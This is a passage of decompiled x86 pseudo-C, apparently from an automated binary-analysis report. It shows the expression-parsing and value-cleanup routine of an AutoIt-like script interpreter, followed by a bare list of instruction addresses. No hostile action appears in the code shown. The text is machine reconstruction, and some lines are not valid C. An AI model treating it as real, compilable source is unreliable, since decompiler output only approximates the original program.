											__eax = E004115D7(__edi, __esi, __eflags);
											__ecx =  *__esi;
											 *( *__esi + 4) = __eax;
											__eax =  *__esi;
											__edx =  *__eax;
											__ecx =  *0x4a95f0;
											__eax =  *(__eax + 4);
											__esp = __esp + 4;
											__edx =  *( *0x4a95f0 + 4);
											__eax = E00410E60(__eax,  *( *0x4a95f0 + 4),  *( *0x4a95f0 + 4));
										}
										goto L31;
									case 0xb:
										_push(0x14);
										__eax = E004115D7(__edi, __esi, __eflags);
										__esp = __esp + 4;
										__eflags = __eax;
										if(__eax == 0) {
											L255:
											__eax = 0;
											 *__esi = 0;
											goto L31;
										}
										__ecx =  *0x4a95f0;
										__eax = E00470870(__eax,  *0x4a95f0);
										 *__esi = __eax;
										goto L31;
								}
							}
							L30:
							_t547 =  *0x4a95f0; // 0x0
							 *_t563 = _t547;
							goto L31;
						}
					}
					if(_t491 < 0x37 || _t491 >= 0x41) {
						__eflags = _t491 - 5;
						if(_t491 != 5) {
							__eflags = _t491 - 0x51;
							if(_t491 > 0x51) {
								goto L9;
							}
							_t88 = _t491 + 0x40af4c; // 0xec
							switch( *((intOrPtr*)(( *_t88 & 0x000000ff) * 4 +  &M0040AEEC))) {
								case 0:
									__eax =  *__eax;
									__eflags = __eax - 4;
									if(__eax < 4) {
										L129:
										__eflags = __eax - 1;
										if(__eax != 1) {
											__eax = __eax - 2;
											__eflags = __eax - 0x27;
											if(__eflags > 0) {
												goto L9;
											}
											__eax =  *(__eax + 0x42bc86) & 0x000000ff;
											switch( *((intOrPtr*)(__eax * 4 +  &M0042BC6E))) {
												case 0:
													__ecx = 1 + __ecx;
													__ebx = 8;
													 *__edi = __ecx;
													goto L10;
												case 1:
													__ecx = 1 + __ecx;
													__ebx = 0xa;
													 *__edi = __ecx;
													goto L10;
												case 2:
													__edi = 0x4a95f0;
													__esi =  &_v128;
													_v108 = 0x16;
													__eax = E0040BC10(0x4a95f0,  &_v128);
													_v72 = 1;
													__edx = _v72;
													_push(__edx);
													goto L170;
												case 3:
													__edi = 0x4a95f0;
													__esi =  &_v128;
													_v108 = 0x16;
													__eax = E0040BC10(0x4a95f0,  &_v128);
													_v80 = 0;
													__ecx = _v80;
													_push(__ecx);
													L170:
													__eax =  &_v128;
													_push(E0040D0B0( &_v128));
													__eax = E004530C9();
													__edi = _a8;
													 *__edi = 1 +  *__edi;
													__esi = _v136;
													goto L4;
												case 4:
													__esp = __esp - 0x10;
													__edi = L"Default";
													__esi = __esp;
													_v108 = 0x16;
													E00401B10(L"Default", __esp, __eflags) =  &_v28;
													_push( &_v28);
													__eax = E0044B8D4();
													__edi = 0x4a95f0;
													__esi =  &_v148;
													__eax = E0040BC10(0x4a95f0, __esi);
													__ecx =  &_v48;
													__esi = E0040D0B0(__esi);
													__eax = _a8;
													 *_a8 = 1 +  *_a8;
													__ecx =  &_v48;
													__eax = E00402250(__ecx);
													__esi = _v156;
													__edi = _a8;
													goto L4;
												case 5:
													goto L9;
											}
										}
										__ecx = 1 + __ecx;
										__ebx = __eax + 6;
										 *__edi = __ecx;
										goto L10;
									}
									__eflags = __eax - 0x27;
									if(__eax < 0x27) {
										goto L9;
									}
									goto L129;
								case 1:
									__edi = 0x4a95f0;
									__esi =  &_v128;
									_v108 = 0x16;
									__eax = E0040BC10(0x4a95f0,  &_v128);
									__eflags = _v124 - 1;
									if(_v124 != 1) {
										__eflags = _v115;
										if(_v115 == 0) {
											__eax = _v120;
										} else {
											__ecx = _v120;
											__eax =  *(_v120 + 0x10);
										}
									} else {
										__eax = _v128;
									}
									__edx = _a4;
									__ebx = _v112;
									__eax = _a8;
									__eax = E00408CC0(_a8, __ebx, __edx, __fp0, _a8); // executed
									__eflags = __eax;
									if(__eax != 0) {
										goto L285;
									} else {
										__eflags =  *((intOrPtr*)(__ebx + 0xf8)) - 1;
										if( *((intOrPtr*)(__ebx + 0xf8)) == 1) {
											goto L285;
										}
										__esi = _v128;
										__edi = _a8;
										goto L4;
									}
								case 2:
									__edi = 0x4a95f0;
									__esi =  &_v128;
									_v108 = 0x16;
									__eax = E0040BC10(0x4a95f0, __esi);
									__edi = _a8;
									__edx = _a4;
									__ecx =  *__edi;
									__eax =  *((intOrPtr*)(_a4 + 4));
									__eax =  *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4);
									__ecx =  *(__eax + 4);
									__ebx =  *__eax;
									__eax = __esi;
									_v32 = __ecx;
									__esi = E0040D0B0(__esi);
									__eax = E00408F40(__edi, __esi);
									__edx = _v32;
									 *(__esi + 8) = 2;
									 *__esi = __ebx;
									 *(__esi + 4) = __edx;
									 *__edi = 1 +  *__edi;
									__esi = _v128;
									goto L4;
								case 3:
									__edi = 0x4a95f0;
									__esi =  &_v128;
									_v108 = 0x16;
									__eax = E0040BC10(0x4a95f0, __esi);
									__edi = _a8;
									__ecx = _a4;
									__eax =  *__edi;
									__edx =  *((intOrPtr*)(_a4 + 4));
									__eax =  *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4);
									__fp0 =  *( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4));
									__eax = __esi;
									_v136 =  *( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4));
									__esi = E0040D0B0(__esi);
									__eax = E00408F40(__edi, __esi);
									__fp0 = _v136;
									 *__esi = __fp0;
									 *(__esi + 8) = 3;
									 *__edi = 1 +  *__edi;
									__esi = _v128;
									goto L4;
								case 4:
									__edi = 0x4a95f0;
									__esi =  &_v128;
									__eax = E0040BC10(0x4a95f0,  &_v128);
									__esi = _a8;
									__eax =  *__esi;
									__edi = _a4;
									__ecx = __eax + 1;
									 *__esi = __eax + 1;
									__edx =  *(__edi + 4);
									__eax =  *( *(__edi + 4) + __eax * 4);
									__eax =  *__eax;
									__edx =  *__eax;
									__esp = __esp - 0x10;
									 *__esp =  *__eax;
									__edx =  *(__eax + 4);
									_v160 =  *(__eax + 4);
									__edx =  *(__eax + 8);
									_v156 =  *(__eax + 8);
									__eax =  *(__eax + 0xc);
									_v152 = __eax;
									 *__eax = 1 +  *__eax;
									__eax =  &_v128;
									__eax = E0040D0B0( &_v128);
									__ebx = _v112;
									_push(__eax);
									_push(__ebx);
									__eax = E004720DB(__eflags, __fp0);
									__eflags = __eax;
									if(__eax != 0) {
										__eax =  *__esi;
										__ecx =  *(__edi + 4);
										__edx =  *( *(__edi + 4) +  *__esi * 4 - 4);
										 *((short*)( *( *(__edi + 4) +  *__esi * 4 - 4) + 0xa)) = E0045E737(__fp0, __ebx, 0x86,  *((short*)( *( *(__edi + 4) +  *__esi * 4 - 4) + 0xa)));
										L285:
										__ecx =  &_v128;
										_push( &_v128);
										goto L296;
									}
									__esi = _v128;
									__edi = _a8;
									_v108 = 0x16;
									goto L4;
								case 5:
									__edi = 0x4a95f0;
									__esi =  &_v128;
									_v108 = 0x16;
									__eax = E0040BC10(0x4a95f0,  &_v128);
									__eflags = _v124 - 1;
									if(__eflags != 0) {
										__eflags = _v115;
										if(__eflags != 0) {
											__ecx = _v120;
											__eax =  *(_v120 + 0x10);
										} else {
											__eax = _v120;
										}
									} else {
										__eax = _v128;
									}
									__edx = _a4;
									__eax = _v112;
									__eax = _a8;
									__eax = E0040C1F0(_a8, __eflags, __fp0, _v112, _a4, _a8);
									__eflags = __eax;
									if(__eax != 0) {
										__eax =  &_v128;
										_push( &_v128);
										goto L296;
									} else {
										__esi = _v128;
										__edi = _a8;
										goto L4;
									}
								case 6:
									__edi = 0x4a95f0;
									__esi =  &_v128;
									__eax = E0040BC10(0x4a95f0, __esi);
									__edx =  &_v85;
									__esi = E0040D0B0(__esi);
									__esi = _v112;
									__eax = _a4;
									__eax = _a8;
									__eax = E004096A0(_a8, __eflags, __fp0, __esi, _a4, _a8,  &_v85);
									__eflags = __eax;
									if(__eax != 0) {
										goto L295;
									}
									__eflags =  *((intOrPtr*)(__esi + 0xf8)) - 1;
									if( *((intOrPtr*)(__esi + 0xf8)) == 1) {
										goto L295;
									}
									__esi = _v128;
									__edi = _a8;
									_v108 = 0x16;
									goto L4;
								case 7:
									__eflags = __ecx;
									if(__ecx == 0) {
										L177:
										__esi = _v112;
										__edx = __esi + 0x488;
										__eax = E00432416(__edx);
										__eflags = __al;
										if(__al == 0) {
											__eax = _a4;
											__ecx =  *((intOrPtr*)(_a4 + 4));
											 *__edi =  *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4);
											 *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)) = E0045E737(__fp0, __esi, 0xa7,  *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)));
											__ecx =  &_v140;
											_push( &_v140);
											goto L296;
										}
										__eax = 0;
										__esp = __esp - 0x10;
										_v68 = 0;
										_v56 = 0;
										__eax = __edx;
										__ebx = __esp;
										_v60 = 1;
										__eax = E0040B960(__edx, __ebx, __ecx, __edi);
										__ecx = _a4;
										__eax =  &_v68;
										_push( &_v68);
										_push(__edi);
										_push(_a4);
										__ecx = __esi;
										__eax = E0047E250(__esi, __eflags, __fp0);
										__eflags = __eax;
										if(__eax != 0) {
											__eax = _a4;
											__ecx =  *((intOrPtr*)(_a4 + 4));
											 *__edi =  *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4);
											 *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)) = E0045E737(__fp0, __esi, 0x6e,  *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)));
											__esi =  &_v92;
											goto L294;
										}
										__edi =  &_v80;
										__esi =  &_v140;
										_v120 = 0x16;
										__eax = E0040BC10(__edi,  &_v140);
										__esi = __edi;
										__eax = E00408F40(__edi, __edi);
										__esi = _v140;
										__edi = _a8;
										goto L4;
									}
									__eax =  *(__edx + 8) & 0x0000ffff;
									__eflags = __ax - 0x33;
									if(__ax == 0x33) {
										L175:
										__ebx = _v112;
										__eax = E00451B42(__ebx, 0xa9, 0, L"Variable must be of type \'Object\'.", 1);
										__eflags = __eax;
										if(__eax != 0) {
											__eax = _a4;
											__ecx =  *((intOrPtr*)(_a4 + 4));
											 *__edi =  *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4);
											 *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)) = E0045E737(__fp0, __ebx, 0xa9,  *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)));
											__ecx =  &_v140;
											_push( &_v140);
											goto L296;
										}
										 *__edi = 1 +  *__edi;
										goto L4;
									}
									__eflags = __ax - 0x35;
									if(__ax != 0x35) {
										goto L177;
									}
									goto L175;
								case 8:
									__ecx = 1 + __ecx;
									__ebx = 5;
									 *__edi = __ecx;
									goto L10;
								case 9:
									__ecx = 1 + __ecx;
									__ebx = 1;
									 *__edi = __ecx;
									goto L10;
								case 0xa:
									__ebx = 0;
									__ecx = 1 + __ecx;
									 *__edi = __ecx;
									goto L10;
								case 0xb:
									__ecx = 1 + __ecx;
									__ebx = 4;
									 *__edi = __ecx;
									goto L10;
								case 0xc:
									__ecx = 1 + __ecx;
									__ebx = 3;
									 *__edi = __ecx;
									goto L10;
								case 0xd:
									__ecx = 1 + __ecx;
									__ebx = 2;
									 *__edi = __ecx;
									goto L10;
								case 0xe:
									__ecx = 1 + __ecx;
									__ebx = 0x12;
									 *__edi = __ecx;
									goto L10;
								case 0xf:
									__ecx = 1 + __ecx;
									__ebx = 0x13;
									 *__edi = __ecx;
									goto L10;
								case 0x10:
									__eax = _v108;
									__eflags = __eax - 0x16;
									if(__eax != 0x16) {
										__eflags = __eax - 0x13;
										if(__eax == 0x13) {
											goto L89;
										}
										__ebx = 0x11;
										L90:
										__ecx = 1 + __ecx;
										 *__edi = __ecx;
										goto L10;
									}
									L89:
									__ebx = 0xb;
									goto L90;
								case 0x11:
									__eax = _v108;
									__eflags = __eax - 0x16;
									if(__eax == 0x16) {
										L155:
										__ebx = 0xc;
										L156:
										__ecx = 1 + __ecx;
										 *__edi = __ecx;
										goto L10;
									}
									__ebx = 0x10;
									__eflags = __eax - 0x13;
									if(__eax != 0x13) {
										goto L156;
									}
									goto L155;
								case 0x12:
									__ecx = 1 + __ecx;
									__ebx = 0xe;
									 *__edi = __ecx;
									goto L10;
								case 0x13:
									_t490 = 0xd;
									 *_t559 = 1 + _t508;
									goto L10;
								case 0x14:
									__ecx = 1 + __ecx;
									__ebx = 9;
									 *__edi = __ecx;
									goto L10;
								case 0x15:
									__ecx = 1 + __ecx;
									__ebx = 6;
									 *__edi = __ecx;
									goto L10;
								case 0x16:
									__ecx = 1 + __ecx;
									__ebx = 0xf;
									 *__edi = __ecx;
									L10:
									_v136 = _t490;
									_v108 = _t490;
									do {
										_t509 = _v95;
										_t564 = _v100;
										if(_t509 != 0) {
											_t375 = _t564[1];
										} else {
											_t375 = _t564;
										}
										_t378 =  *( *_t375 * 0x15 + _t490 + 0x4918f0) & 0x000000ff;
										if(_t378 != 3) {
											__eflags = _t378 - 6;
											if(_t378 > 6) {
												L71:
												__eflags = _t490 - 7;
												if(_t490 == 7) {
													L134:
													__eflags = _v124;
													if(_v124 == 0) {
														L73:
														_t563 = _v128;
														while(1) {
															L4:
															_t508 =  *_t559;
															if(_t508 == _a16) {
																goto L9;
															}
															goto L5;
														}
														goto L9;
													}
													E0040B960(E0040D0B0( &_v128),  &_v52, _t509, _t559);
													_t465 = E0040CE70( &_v52);
													__eflags = _t465;
													if(_t465 == 0) {
														L276:
														__eflags = _v136 - 7;
														if(_v136 != 7) {
															L138:
															E00408F40(_t559,  &_v52);
															_t563 = _v128;
															goto L4;
														}
														_t566 = 8;
														L278:
														_t468 = E00441DB4(_a4, _t559);
														__eflags = _t468;
														if(_t468 != 0) {
															E0045E737(_t594, _v112, 0x6e, _v92);
															_t567 =  &_v64;
															L294:
															E00408F40(_t559, _t567);
															L295:
															_push( &_v128);
															L296:
															E0044B92D();
															E004107C0( &_v108);
															_t475 = 1;
															L20:
															return _t475;
														}
														_t476 =  &_v128;
														__eflags = _v136 - _t566;
														if(_v136 != _t566) {
															_v76 = 0;
															_push(_v76);
														} else {
															_v84 = 1;
															_push(_v84);
														}
														_push(E0040D0B0(_t476));
														E004530C9();
														E0040BE70( &_v112);
														goto L138;
													}
													_t566 = 8;
													__eflags = _v136 - 8;
													if(_v136 == 8) {
														goto L278;
													}
													__eflags = _t465;
													if(_t465 == 0) {
														goto L276;
													}
													goto L138;
												}
												__eflags = _t490 - 8;
												if(_t490 == 8) {
													goto L134;
												}
												goto L73;
											}
											switch( *((intOrPtr*)(_t378 * 4 +  &M0040AED0))) {
												case 0:
													__eflags = _t509;
													if(__eflags != 0) {
														 *_t564 = _t490;
														_v95 = 0;
													} else {
														_push(8);
														_t480 = E004115D7(_t559, _t564, __eflags);
														_t575 = _t575 + 4;
														__eflags = _t480;
														if(_t480 == 0) {
															_t480 = 0;
														} else {
															 *_t480 = _t490;
														}
														 *(_t480 + 4) = _t564;
														_v100 = _t480;
													}
													_t85 =  &_v104;
													 *_t85 = _v104 + 1;
													__eflags =  *_t85;
													goto L71;
												case 1:
													goto L84;
												case 2:
													while(1) {
														__edx = _v100;
														__eflags = __cl;
														if(__cl == 0) {
															__eax = __edx;
														} else {
															__eax =  *(__edx + 4);
														}
														__eflags =  *__eax - 0x12;
														if( *__eax == 0x12) {
															break;
														}
														__eflags = __cl;
														if(__cl == 0) {
															__eax = __edx;
														} else {
															__eax =  *(__edx + 4);
														}
														__eflags =  *__eax - 0x14;
														if( *__eax == 0x14) {
															goto L290;
														} else {
															__edx =  &_v128;
															__eax =  &_v104;
															__eax = E0040B5F0( &_v104, __fp0,  &_v128);
															__eflags = __eax;
															if(__eax != 0) {
																goto L289;
															} else {
																__cl = _v95;
																continue;
															}
														}
													}
													__esi =  &_v104;
													__eax = E0040BE70(__esi);
													goto L71;
												case 3:
													goto L71;
												case 4:
													__eax = _v92;
													__ecx = _v112;
													__eax = E0045E737(__fp0, _v112, 0x6b, _v92);
													goto L295;
												case 5:
													__eax = _v92;
													__ecx = _v112;
													__eax = E0045E737(__fp0, _v112, 0x6c, _v92);
													goto L295;
												case 6:
													L290:
													__eax = _v92;
													__ecx = _v112;
													__eax = E0045E737(__fp0, _v112, 0x6d, _v92);
													goto L295;
											}
										}
										if(_v124 != 1) {
											break;
										}
										_t483 = _v120;
										if(_t483 != 0) {
											_t570 = _t483;
											do {
												_t561 =  *(_t570 + 0x10);
												E00408F40(_t561, _t570);
												_push(_t570);
												E004111DC();
												_t575 = _t575 + 4;
												_t570 = _t561;
												__eflags = _t561;
											} while (_t561 != 0);
										}
										_t486 = _v100;
										if(_t486 == 0) {
											L19:
											_t475 = 0;
											goto L20;
										} else {
											do {
												_t571 =  *(_t486 + 4);
												_push(_t486);
												E004111DC();
												_t575 = _t575 + 4;
												_t486 = _t571;
											} while (_t571 != 0);
											goto L19;
										}
										L84:
										__ecx =  &_v128;
										__eax =  &_v104;
										__eax = E0040B5F0( &_v104, __fp0,  &_v128);
										__eflags = __eax;
									} while (__eax == 0);
									L289:
									E0045E737(_t594, _v112, 0x6e, _v92);
									goto L295;
								case 0x17:
									goto L9;
							}
						}
						_t499 = _v124;
						_v108 = 0x16;
						__eflags = _t499;
						if(_t499 != 0) {
							__eflags = _v115;
							if(__eflags != 0) {
								E00408E80(_v120, _t508, 0x4a95f0);
								_t499 = _v128;
								_v119 = 0;
							} else {
								_push(0x18);
								_t442 = E004115D7(_t559, _t563, __eflags);
								_t575 = _t575 + 4;
								__eflags = _t442;
								if(_t442 == 0) {
									_t443 = 0;
								} else {
									_v136 = _t442;
									_t503 = _v136;
									E0040B960(0x4a95f0, _t503, _t508, _t559);
									_t443 = _t503;
									_t499 = _v124;
								}
								 *((intOrPtr*)(_t443 + 0x10)) = _v120;
								_v120 = _t443;
							}
							L55:
							_t427 =  *( *(_a4 + 4) +  *_t559 * 4);
							_t501 = _t499 + 1;
							_v124 = _t501;
							__eflags = _t501 - 1;
							if(_t501 != 1) {
								__eflags = _v115;
								if(_v115 != 0) {
									_t502 =  *(_v120 + 0x10);
								} else {
									_t502 = _v120;
								}
							} else {
								_t502 = _t563;
							}
							_t531 =  *_t427;
							_t428 = _t502[3];
							_v136 = _t531;
							__eflags = _t428;
							if(_t428 != 0) {
								E004431AD(_t428);
								_t531 = _v140;
								_t502[3] = 0;
							}
							_t430 = _t502[2];
							__eflags = _t430 - 8;
							if(_t430 == 8) {
								_t551 =  *_t502;
								__eflags = _t551;
								if(_t551 == 0) {
									goto L59;
								}
								__imp__#9(_t551);
								_push( *_t502);
								E004111DC();
								_t531 = _v140;
								_t575 = _t575 + 4;
								goto L63;
							} else {
								L59:
								__eflags = _t430 - 0xa;
								if(_t430 == 0xa) {
									_t431 =  *_t502;
									__eflags = _t431;
									if(_t431 != 0) {
										E0044318E(_t431);
										_t531 = _v140;
									}
								} else {
									__eflags = _t430 - 5;
									if(_t430 == 5) {
										E0040E270(_t502, _t563);
										_t531 = _v136;
									} else {
										__eflags = _t430 - 0xb;
										if(_t430 == 0xb) {
											_push( *((intOrPtr*)( *_t502 + 4)));
											E004111DC();
											_push( *_t502);
											E004111DC();
											_t531 = _v136;
											_t575 = _t575 + 8;
										} else {
											__eflags = _t430 - 0xc;
											if(_t430 == 0xc) {
												_t438 =  *_t502;
												__eflags = _t438;
												if(_t438 != 0) {
													E0044B3D9(_t438);
													_t531 = _v140;
												}
											}
										}
									}
								}
								L63:
								_t502[2] = 1;
								 *_t502 = _t531;
								 *_t559 = 1 +  *_t559;
								continue;
							}
						}
						__eflags = _t563 - 0x4a95f0;
						if(_t563 == 0x4a95f0) {
							goto L55;
						}
						_t446 =  *(_t563 + 0xc);
						__eflags = _t446;
						if(_t446 != 0) {
							E004431AD(_t446);
							 *(_t563 + 0xc) = 0;
						}
						_t448 =  *(_t563 + 8);
						__eflags = _t448 - 8;
						if(_t448 == 8) {
							_t534 =  *_t563;
							__eflags = _t534;
							if(_t534 == 0) {
								goto L49;
							}
							__imp__#9(_t534);
							_push( *_t563);
							E004111DC();
							_t575 = _t575 + 4;
							goto L53;
						} else {
							L49:
							__eflags = _t448 - 0xa;
							if(_t448 == 0xa) {
								_t449 =  *_t563;
								__eflags = _t449;
								if(_t449 != 0) {
									E0044318E(_t449);
								}
							} else {
								__eflags = _t448 - 5;
								if(_t448 == 5) {
									E0040E270(_t563, _t563);
								} else {
									__eflags = _t448 - 0xb;
									if(_t448 == 0xb) {
										_push( *((intOrPtr*)( *_t563 + 4)));
										E004111DC();
										_push( *_t563);
										E004111DC();
										_t575 = _t575 + 8;
									} else {
										__eflags = _t448 - 0xc;
										if(_t448 == 0xc) {
											_t459 =  *_t563;
											__eflags = _t459;
											if(_t459 != 0) {
												E0044B3D9(_t459);
											}
										}
									}
								}
							}
							L53:
							 *(_t563 + 8) = 1;
							 *_t563 = 0;
							_t450 =  *0x4a95f8; // 0x1
							 *(_t563 + 8) = _t450;
							_t451 =  *0x4a95f8; // 0x1
							__eflags = _t451 - 1;
							if(_t451 != 1) {
								_t452 = _t451 - 1;
								__eflags = _t452 - 0xb;
								if(__eflags > 0) {
									goto L55;
								}
								switch( *((intOrPtr*)(_t452 * 4 +  &M0042BCAE))) {
									case 0:
										goto L54;
									case 1:
										 *_t563 =  *0x4a95f0;
										_t553 =  *0x4a95f4; // 0x0
										 *((intOrPtr*)(_t563 + 4)) = _t553;
										goto L55;
									case 2:
										__fp0 =  *0x4a95f0;
										 *__esi = __fp0;
										goto L55;
									case 3:
										_push(0x10);
										__eax = E004115D7(__edi, __esi, __eflags);
										__esp = __esp + 4;
										__eflags = __eax;
										if(__eax == 0) {
											__eax = 0;
											 *(__esi + 0xc) = 0;
										} else {
											__ecx =  *0x4a95fc; // 0x0
											__edx =  *__ecx;
											 *__eax =  *__ecx;
											__edx =  *(__ecx + 4);
											 *(__eax + 4) =  *(__ecx + 4);
											__edx =  *(__ecx + 8);
											 *(__eax + 8) = __edx;
											__ecx =  *(__ecx + 0xc);
											 *(__eax + 0xc) = __ecx;
											 *__ecx = 1 +  *__ecx;
											 *(__esi + 0xc) = __eax;
										}
										goto L55;
									case 4:
										_push(0x214);
										__eax = E004115D7(__edi, __esi, __eflags);
										__esp = __esp + 4;
										__eflags = __eax;
										if(__eax == 0) {
											__eax = 0;
											__eflags = 0;
										} else {
											__esi =  *0x4a95f0; // 0x0
											__ebx = _v124;
											__ecx = 0x85;
											__edi = __eax;
											__eax = memcpy(__eax, __esi, 0x85 << 2);
											__esi + __ecx = __esi + __ecx + __ecx;
											__ecx = 0;
											__esi = _v128;
											__edi = _a8;
										}
										 *__esi = __eax;
										__eflags =  *(__eax + 4);
										if( *(__eax + 4) != 0) {
											__eax =  *(__eax + 4);
											 *__eax = 1 +  *__eax;
										}
										goto L55;
									case 5:
										__eax =  *0x4a95f0;
										 *__esi = __eax;
										goto L55;
									case 6:
										__ecx =  *0x4a95f0;
										 *__esi = __ecx;
										goto L55;
									case 7:
										__eflags =  *0x4a95f0;
										if(__eflags != 0) {
											_push(0x10);
											__eax = E004115D7(__edi, __esi, __eflags);
											__esp = __esp + 4;
											_push(__eax);
											 *__esi = __eax;
											__imp__#8();
											__edx =  *0x4a95f0; // 0x0
											__eax =  *__esi;
											_push(__edx);
											_push(__eax);
											__imp__#10();
											__eflags = __eax;
											if(__eax < 0) {
												__ecx =  *__esi;
												_push( *__esi);
												__imp__#9();
												__edx =  *__esi;
												_push(__edx);
												__eax = E004111DC();
												__esp = __esp + 4;
												 *__esi = 0;
											}
										}
										goto L55;
									case 8:
										__al =  *0x4a95f0;
										 *__esi = __al;
										goto L55;
									case 9:
										_push(0x18);
										__eax = E004115D7(__edi, __esi, __eflags);
										__esp = __esp + 4;
										__eflags = __eax;
										if(__eax == 0) {
											goto L209;
										}
										__ecx =  *0x4a95f0; // 0x0
										__eax = E0044B8A3(__eax, __ecx);
										 *__esi = __eax;
										goto L55;
									case 0xa:
										_push(8);
										__eax = E004115D7(__edi, __esi, __eflags);
										 *__esi = __eax;
										__edx =  *0x4a95f0; // 0x0
										__ecx =  *__edx;
										 *__eax =  *__edx;
										__edx =  *__esi;
										__eax =  *( *__esi);
										__esp = __esp + 4;
										__eflags = __eax;
										if(__eflags == 0) {
											_push(1);
											__eax = E004115D7(__edi, __esi, __eflags);
											__ecx =  *__esi;
											 *(__ecx + 4) = __eax;
											__edx =  *__esi;
											__eax =  *(__edx + 4);
											__esp = __esp + 4;
											 *__eax = 0;
										} else {
											_push(__eax);
											__eax = E004115D7(__edi, __esi, __eflags);
											__ecx =  *__esi;
											 *( *__esi + 4) = __eax;
											__eax =  *__esi;
											__edx =  *__eax;
											__ecx =  *0x4a95f0; // 0x0
											__eax =  *(__eax + 4);
											__esp = __esp + 4;
											__edx =  *(__ecx + 4);
											__eax = E00410E60(__eax,  *(__ecx + 4),  *(__ecx + 4));
										}
										goto L55;
									case 0xb:
										_push(0x14);
										__eax = E004115D7(__edi, __esi, __eflags);
										__esp = __esp + 4;
										__eflags = __eax;
										if(__eax == 0) {
											L209:
											__eax = 0;
											 *__esi = 0;
											goto L55;
										}
										__ecx =  *0x4a95f0; // 0x0
										__eax = E00470870(__eax, __ecx);
										 *__esi = __eax;
										goto L55;
								}
							}
							L54:
							_t554 =  *0x4a95f0; // 0x0
							 *_t563 = _t554;
							goto L55;
						}
					}
					L9:
					_t490 = 0x14;
					goto L10;
				}
			}































































































                                  0x0040a780
                                  0x0040a786
                                  0x0040a796
                                  0x0040a79a
                                  0x0040a7a0
                                  0x0040ae8c
                                  0x0040ae97
                                  0x0040ae9d
                                  0x0040aea3
                                  0x0040aea9
                                  0x0040aeae
                                  0x0040aeae
                                  0x0040a7a6
                                  0x0040a7a9
                                  0x0040a7ab
                                  0x0040a7b0
                                  0x0040a7b4
                                  0x0040a7b8
                                  0x0040a7bc
                                  0x0040a7c1
                                  0x0040a7c6
                                  0x0040a7cb
                                  0x0042b072
                                  0x0040a7d1
                                  0x0040a7d1
                                  0x0040a7d1
                                  0x0040a7da
                                  0x0040a7dd
                                  0x0040a7e3
                                  0x0040a7f0
                                  0x0040a7f4
                                  0x0040a7fc
                                  0x0040a800
                                  0x0040a800
                                  0x0040a800
                                  0x0040a805
                                  0x00000000
                                  0x00000000
                                  0x0040a807
                                  0x0040a810
                                  0x0040a817
                                  0x00000000
                                  0x00000000
                                  0x0040a819
                                  0x0040a820
                                  0x0040a8ad
                                  0x0040a8b1
                                  0x0040a8b9
                                  0x0040a8bb
                                  0x0040ac4a
                                  0x0040ac4f
                                  0x0040ad54
                                  0x0040ad56
                                  0x0040ad5b
                                  0x0040ad5e
                                  0x0040ad60
                                  0x0042b9fa
                                  0x0040ad66
                                  0x0040ad66
                                  0x0040ad6a
                                  0x0040ad73
                                  0x0040ad78
                                  0x0040ad7a
                                  0x0040ad7a
                                  0x0040ad82
                                  0x0040ad85
                                  0x0040ac55
                                  0x0040ac5e
                                  0x0040ac63
                                  0x0040ac67
                                  0x0040ac67
                                  0x0040a930
                                  0x0040a938
                                  0x0040a93b
                                  0x0040a93c
                                  0x0040a940
                                  0x0040a943
                                  0x0040ac71
                                  0x0040ac76
                                  0x0040ac7a
                                  0x0042ba04
                                  0x0040ac80
                                  0x0040ac80
                                  0x0040ac80
                                  0x0040a949
                                  0x0040a949
                                  0x0040a949
                                  0x0040a94d
                                  0x0040a951
                                  0x0040a953
                                  0x0040a956
                                  0x0040a958
                                  0x0042ba0e
                                  0x0042ba13
                                  0x0042ba17
                                  0x0042ba17
                                  0x0040a95e
                                  0x0040a961
                                  0x0040a964
                                  0x0042ba23
                                  0x0042ba25
                                  0x0042ba27
                                  0x00000000
                                  0x00000000
                                  0x0042ba2e
                                  0x0042ba38
                                  0x0042ba3a
                                  0x0042ba3b
                                  0x0042ba40
                                  0x00000000
                                  0x0040a96a
                                  0x0040a96a
                                  0x0040a96a
                                  0x0040a96d
                                  0x0042ba48
                                  0x0042ba4a
                                  0x0042ba4c
                                  0x0042ba53
                                  0x0042ba53
                                  0x0040a973
                                  0x0040a973
                                  0x0040a976
                                  0x0042ba61
                                  0x0040a97c
                                  0x0040a97c
                                  0x0040a97f
                                  0x0042ba6f
                                  0x0042ba71
                                  0x0042ba74
                                  0x0042ba75
                                  0x0042ba83
                                  0x0042ba84
                                  0x0042ba89
                                  0x0040a985
                                  0x0040a985
                                  0x0040a988
                                  0x0042ba91
                                  0x0042ba93
                                  0x0042ba95
                                  0x0042ba9c
                                  0x0042ba9c
                                  0x0042ba95
                                  0x0040a988
                                  0x0040a97f
                                  0x0040a976
                                  0x0040a98e
                                  0x0040a98e
                                  0x0040a992
                                  0x0040a994
                                  0x0040a99a
                                  0x0040a9a1
                                  0x0040a9a6
                                  0x0040a9a9
                                  0x0040a9ab
                                  0x0042baa6
                                  0x0040a9b1
                                  0x0040a9b3
                                  0x0040a9b8
                                  0x0040a9bb
                                  0x0040a9be
                                  0x0040a9c1
                                  0x0040a9c4
                                  0x0040a9c7
                                  0x0040a9c7
                                  0x0040a9c7
                                  0x0040a9cd
                                  0x0040a9d0
                                  0x0040a9d4
                                  0x0040a9d6
                                  0x0040a9dd
                                  0x0042bab7
                                  0x0042babc
                                  0x0042babc
                                  0x0040a9e3
                                  0x0040a9ea
                                  0x0042bad4
                                  0x0042bad4
                                  0x0040a800
                                  0x0040a800
                                  0x0040a800
                                  0x0040a805
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040a805
                                  0x0040a800
                                  0x0040a964
                                  0x0040a8c1
                                  0x0040a8c7
                                  0x00000000
                                  0x00000000
                                  0x0040a8c9
                                  0x0040a8cc
                                  0x0040a8ce
                                  0x0042b776
